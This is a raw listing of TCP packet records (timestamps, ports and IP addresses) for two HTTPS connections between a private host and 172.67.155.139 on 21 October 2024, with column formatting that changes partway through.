Oct 21, 2024 14:17:02.254333973 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.254384995 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.313498020 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.360694885 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.371006012 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.371176958 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.371265888 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.371342897 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.371376038 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.371470928 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.371568918 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.371588945 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.371592045 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.371588945 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.371622086 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.371648073 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.371663094 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.372236967 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.372303009 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.373051882 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.373106956 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.373157024 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.373210907 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.373881102 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.373933077 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.374798059 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.374855995 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.374917030 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.374969959 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
                                                              Oct 21, 2024 14:17:02.376210928 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.376276016 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.376303911 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.376362085 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.471630096 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.471910954 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.487498999 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.487726927 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.487751961 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.487786055 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.487812996 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.487966061 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.488109112 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.488140106 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.488198996 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554193020 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554254055 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554284096 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554315090 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554331064 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554341078 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554357052 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554361105 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554378986 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554390907 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554435015 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554435968 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554452896 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554475069 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554492950 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554536104 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554537058 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554549932 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554577112 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554596901 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.554636002 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.554644108 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.595067024 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.605119944 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.605293989 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.605320930 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.605384111 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.605407953 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.605413914 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.605442047 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.605453968 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.605470896 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.657598019 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.662184000 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.662200928 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.662257910 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.662483931 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.662539959 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.662697077 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.662755013 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.662940025 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.663000107 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.663031101 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.663471937 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.663531065 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.663546085 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.663599014 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.664067030 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.664124012 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.664150953 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.664202929 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.664678097 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.664737940 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.664766073 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.664825916 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.705498934 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.705718040 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.721676111 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.721946001 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.722047091 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.722078085 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.722100973 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.722134113 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.722146988 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.722167969 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.767050028 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.779783010 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.779810905 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.780051947 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.780081987 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.780106068 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.780276060 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.780306101 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.780348063 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.780498028 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.780563116 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.781125069 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.781189919 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.781198978 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.781255960 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.822778940 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.823061943 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.823090076 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.823287964 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.839085102 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.839313984 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.839591980 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.839591980 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.839621067 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.892035961 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.896667957 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.896678925 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.896828890 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.896861076 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.896910906 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.896935940 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.897068024 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.897228003 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.897259951 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.898330927 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.898380041 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.898397923 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.898410082 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.898442030 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.938745975 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.955779076 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.955787897 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.955935955 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.955967903 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.956036091 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:02.956059933 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:02.956078053 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.013850927 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.013895988 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.014013052 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.014095068 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.014095068 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.014095068 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.014127016 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.014180899 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.015141964 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.015187979 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.015305996 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.015305996 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.015338898 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.015383005 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.056881905 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.057099104 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.057147026 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.057179928 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.057199001 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.072885036 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.072971106 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.073050022 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.073050022 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.073084116 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.073138952 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.130568027 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.130791903 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.130847931 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.130847931 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.130877972 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.131012917 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.131109953 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.131160975 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.131195068 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.131217003 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.131633997 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.131690979 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.131784916 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.131786108 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.131815910 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.173114061 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.173866987 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.173896074 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.174148083 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.174177885 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.174237967 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.190433025 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.190484047 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.190613985 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.190613985 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.190645933 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.190702915 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.190846920 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.190915108 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.247664928 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.247927904 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.248167992 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.248239994 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.248282909 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.248317957 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.248318911 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.248318911 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.248351097 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.248981953 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.249036074 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.249044895 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.249171019 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.249214888 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.249222994 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.249758959 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.249805927 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.249815941 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.291234970 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.291286945 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:03.291302919 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.291342974 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:03.293947935 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:38.843696117 CEST49744443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:38.843744993 CEST44349744172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:38.843801975 CEST49744443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:38.857819080 CEST49744443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:38.857837915 CEST44349744172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:39.489557981 CEST44349744172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:39.489620924 CEST49744443192.168.2.4172.67.155.139
Oct 21, 2024 14:17:39.537741899 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:39.537760019 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:39.538697958 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:39.538755894 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:39.543144941 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:39.583328009 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.495712042 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.495850086 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.495907068 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.495932102 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.495974064 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.495980024 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.496079922 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.496123075 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.496129036 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.496229887 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.496279001 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.496285915 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.496324062 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.496330023 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.496968985 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.496973991 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.497010946 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.500776052 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.500821114 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.500853062 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.500900030 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.500931978 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.501087904 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.501146078 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.501152039 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.501250982 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.501279116 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.501285076 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.501296997 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.501321077 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.501336098 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.501383066 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.501419067 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.502156973 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.502201080 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.502207041 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.502300978 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.502345085 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.502351046 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.502387047 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.503067970 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.504962921 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.504968882 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.505024910 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.531593084 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.531769991 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.531827927 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.531842947 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.531881094 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.532218933 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.532366037 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.532411098 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.532417059 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.532862902 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.602389097 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.602564096 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.602619886 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.602633953 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.602673054 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.602680922 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.602771997 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.602817059 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.602823973 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.602925062 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.602972031 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.602981091 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.603017092 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.603085995 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.603238106 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.603282928 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.603290081 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.604135990 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.604197979 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.604213953 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.604234934 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.604255915 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.604263067 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.604274988 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.604300022 CEST  49744  443    192.168.2.4      172.67.155.139
Oct 21, 2024 14:17:40.605031967 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.605120897 CEST  443    49744  172.67.155.139   192.168.2.4
Oct 21, 2024 14:17:40.605170012 CEST  49744  443    192.168.2.4      172.67.155.139
